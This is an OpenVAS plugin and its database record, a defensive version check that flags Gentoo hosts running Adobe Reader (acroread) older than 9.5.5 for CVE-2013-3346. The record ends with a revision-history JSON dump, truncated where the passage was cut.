ID OPENVAS:1361412562310121024 Type openvas Reporter Eero Volotinen Modified 2018-10-26T00:00:00
Description
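Gentoo Linux local security check for GLSA 201309-10 (Adobe Reader, CVE-2013-3346). The check compares the installed app-text/acroread package version with the fixed release and reports versions earlier than 9.5.5.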
###############################################################################
# OpenVAS Vulnerability Test
# $Id: glsa-201309-10.nasl 12128 2018-10-26 13:35:25Z cfischer $
#
# Gentoo Linux security check
#
# Authors:
# Eero Volotinen <eero.volotinen@solinor.com>
#
# Copyright:
# Copyright (c) 2015 Eero Volotinen, http://solinor.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Registration pass: when `description` is set, only the metadata below is
# recorded and the script leaves through exit(0) before any host check runs.
if(description)
{
  # --- Plugin identity and bookkeeping ---
  script_oid("1.3.6.1.4.1.25623.1.0.121024");
  script_version("$Revision: 12128 $");
  script_tag(name:"creation_date", value:"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)");
  script_tag(name:"last_modification", value:"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $");
  script_name("Gentoo Security Advisory GLSA 201309-10");
  script_family("Gentoo Local Security Checks");
  script_copyright("Eero Volotinen");
  script_category(ACT_GATHER_INFO);

  # --- Advisory content shown in the scan report ---
  script_tag(name:"summary", value:"Gentoo Linux Local Security Checks GLSA 201309-10");
  script_tag(name:"insight", value:"An unspecified vulnerability exists in Adobe Reader.");
  script_tag(name:"solution", value:"Update the affected packages to the latest available version.");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"URL", value:"https://security.gentoo.org/glsa/201309-10");
  script_cve_id("CVE-2013-3346");

  # --- Severity and detection quality ---
  # The vector uses CVSS v2 notation (it carries the Au metric).
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  # "package": the finding rests on the installed package version, not on
  # exercising the flaw itself.
  script_tag(name:"qod_type", value:"package");

  # --- Preconditions ---
  # The check is launched only when both knowledge-base keys are set. Their
  # names suggest an authenticated SSH login to a Gentoo host with a collected
  # package list, presumably filled in by gather-package-list.nasl (confirm
  # there). A host scanned without working credentials is not assessed by this
  # plugin, so a missing finding is not evidence that the host is patched.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/gentoo", "ssh/login/pkg");

  exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-gentoo.inc");
# Version check for GLSA 201309-10: app-text/acroread below 9.5.5 is flagged,
# while 9.5.5 or later is treated as unaffected. ispkgvuln() is not defined in
# this file (presumably it comes from pkg-lib-gentoo.inc); a non-NULL result is
# appended to the report text.
report = "";

res = ispkgvuln(pkg:"app-text/acroread",
                unaffected: make_list("ge 9.5.5"),
                vulnerable: make_list("lt 9.5.5"));
if(res != NULL) {
  report += res;
}

if(report != "") {
  # At least one vulnerable package version was found: raise the finding.
  security_message(data:report);
} else if (__pkg_match) {
  # __pkg_match is set outside this file; presumably it means the package was
  # found in the installed list (confirm in pkg-lib-gentoo.inc). Exit code 99
  # tells the scanner the host is not vulnerable.
  exit(99);
}
# Neither branch taken: the script ends without reporting a result.
{"id": "OPENVAS:1361412562310121024", "bulletinFamily": "scanner", "title": "Gentoo Security Advisory GLSA 201309-10", "description": "Gentoo Linux Local Security Checks GLSA 201309-10", "published": "2015-09-29T00:00:00", "modified": "2018-10-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "reporter": "Eero Volotinen", "references": ["https://security.gentoo.org/glsa/201309-10"], "cvelist": ["CVE-2013-3346"], "type": "openvas", "lastseen": "2019-05-29T18:36:08", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10", "edition": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "d4b17a0e0f830b280db150c2a4861b0de54ff0e9c7a1b00ca26568b3e4b353cf", "hashmap": [{"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "2c746672350419172d2ce265689a1e41", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "0c617a5f20441a2b260dec4e0f367e48", "key": "description"}, {"hash": "accf15eb411ebbb334dce1b0882773ab", "key": "title"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2018-04-09T11:30:47", "modified": "2018-04-06T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: glsa-201309-10.nasl 9374 2018-04-06 08:58:12Z cfischer $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\nscript_version(\"$Revision: 9374 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:58:12 +0200 (Fri, 06 Apr 2018) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10\");\nscript_tag(name: \"insight\", value: \"An unspecified vulnerability exists in Adobe Reader.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201309-10\");\nscript_cve_id(\"CVE-2013-3346\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Gentoo Linux Local Check: 
https://security.gentoo.org/glsa/201309-10", "type": "openvas", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-04-09T11:30:47"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10", "edition": 1, "enchantments": {}, "hash": "4a4ce174154ea6e1ec0c13108a0aaa21aa92c214a7fd6b99c241402810214e63", "hashmap": [{"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "4b2bff744590ab68fb488f63f2c691e6", "key": "sourceData"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "451ccf9b33cae434b1236ed7a06114ec", "key": "modified"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "0c617a5f20441a2b260dec4e0f367e48", "key": "description"}, {"hash": "accf15eb411ebbb334dce1b0882773ab", "key": "title"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2017-07-02T21:12:35", "modified": "2016-11-15T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: 
glsa-201309-10.nasl 4513 2016-11-15 09:37:48Z cfi $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\nscript_version(\"$Revision: 4513 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2016-11-15 10:37:48 +0100 (Tue, 15 Nov 2016) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10\");\nscript_tag(name: \"insight\", value: \"An unspecified vulnerability exists in Adobe Reader.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201309-10\");\nscript_cve_id(\"CVE-2013-3346\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"login/SSH/success\", \"ssh/login/gentoo\");\nscript_category(ACT_GATHER_INFO);\nscript_summary(\"Gentoo Linux Local Security Checks 
https://security.gentoo.org/glsa/201309-10\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:12:35"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10", "edition": 4, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "24f19a20771d8105fafdbe65704dd375b2ac4dbd3287183cd62bb1a1cf1e80e6", "hashmap": [{"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "2c746672350419172d2ce265689a1e41", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "0c617a5f20441a2b260dec4e0f367e48", "key": "description"}, {"hash": "accf15eb411ebbb334dce1b0882773ab", "key": "title"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": 
"bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2018-08-30T19:22:01", "modified": "2018-04-06T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: glsa-201309-10.nasl 9374 2018-04-06 08:58:12Z cfischer $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\nscript_version(\"$Revision: 9374 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:58:12 +0200 (Fri, 06 Apr 2018) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10\");\nscript_tag(name: \"insight\", value: \"An unspecified vulnerability exists in Adobe Reader.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201309-10\");\nscript_cve_id(\"CVE-2013-3346\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Gentoo Linux Local Check: 
https://security.gentoo.org/glsa/201309-10", "type": "openvas", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:22:01"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10", "edition": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "d4b17a0e0f830b280db150c2a4861b0de54ff0e9c7a1b00ca26568b3e4b353cf", "hashmap": [{"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "2c746672350419172d2ce265689a1e41", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "0c617a5f20441a2b260dec4e0f367e48", "key": "description"}, {"hash": "accf15eb411ebbb334dce1b0882773ab", "key": "title"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2018-09-01T23:49:58", "modified": "2018-04-06T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo 
Linux security check\n# $Id: glsa-201309-10.nasl 9374 2018-04-06 08:58:12Z cfischer $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\nscript_version(\"$Revision: 9374 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:58:12 +0200 (Fri, 06 Apr 2018) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10\");\nscript_tag(name: \"insight\", value: \"An unspecified vulnerability exists in Adobe Reader.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201309-10\");\nscript_cve_id(\"CVE-2013-3346\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", 
value:\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10", "type": "openvas", "viewCount": 1}, "differentElements": ["modified", "sourceData", "title"], "edition": 5, "lastseen": "2018-09-01T23:49:58"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Gentoo Linux Local Security Checks GLSA 201309-10", "edition": 7, "enchantments": {"dependencies": {"modified": "2018-10-29T12:38:56", "references": [{"idList": ["EDB-ID:30394"], "type": "exploitdb"}, {"idList": ["MACOSX_ADOBE_READER_APSB13-15.NASL", "ADOBE_READER_APSB13-15.NASL", "ADOBE_ACROBAT_APSB13-15.NASL", "REDHAT-RHSA-2013-0826.NASL", "GENTOO_GLSA-201309-10.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:B27D20AA97E34E737FEFFB96CFD7603B"], "type": "threatpost"}, {"idList": ["ACROBAT_TOOLBUTTON"], "type": "canvas"}, {"idList": ["KLA10457"], "type": "kaspersky"}, {"idList": ["GLSA-201309-10"], "type": "gentoo"}, {"idList": ["CVE-2013-3346"], "type": "cve"}, {"idList": ["SSV:61170"], "type": "seebug"}, {"idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_TOOLBUTTON", "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_TOOLBUTTON"], "type": "metasploit"}, {"idList": ["PACKETSTORM:124464", "PACKETSTORM:124463"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-21684"], "type": "zdt"}, {"idList": ["ZDI-13-212"], "type": 
"zdi"}, {"idList": ["OPENVAS:1361412562310803617", "OPENVAS:1361412562310803616", "OPENVAS:1361412562310803614", "OPENVAS:1361412562310803615", "OPENVAS:1361412562310803613"], "type": "openvas"}, {"idList": ["THN:1EA4AB16D6C3A0518A078CC8C9304FA5"], "type": "thn"}]}, "score": {"value": 7.2, "vector": "NONE"}}, "hash": "8f362fd1b998098bedd58734c2c94faef8b7b53f601046c5082841a5974cd02f", "hashmap": [{"hash": "385d33352d9166a7843835ca90fab1b9", "key": "title"}, {"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "589c062b55f39e8ff43a33d236527a1f", "key": "sourceData"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "923238ed79f5e9451dcfc84597907102", "key": "description"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "9b693da47adba5957bc32ade1e81b10f", "key": "modified"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2018-10-29T12:38:56", "modified": "2018-10-26T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201309-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen 
<eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201309-10\");\n script_tag(name:\"insight\", value:\"An unspecified vulnerability exists in Adobe Reader.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201309-10\");\n script_cve_id(\"CVE-2013-3346\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux 
Local Security Checks GLSA 201309-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "title": "Gentoo Security Advisory GLSA 201309-10", "type": "openvas", "viewCount": 3}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2018-10-29T12:38:56"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "fb0324d45b438a38fcb6b5615a2faac1"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "923238ed79f5e9451dcfc84597907102"}, {"key": "href", "hash": "603158070a66cc5722533c98e069889d"}, {"key": "modified", "hash": "9b693da47adba5957bc32ade1e81b10f"}, {"key": "naslFamily", "hash": "cf18d881f0f76f23f322ed3f861d3616"}, {"key": "pluginID", "hash": 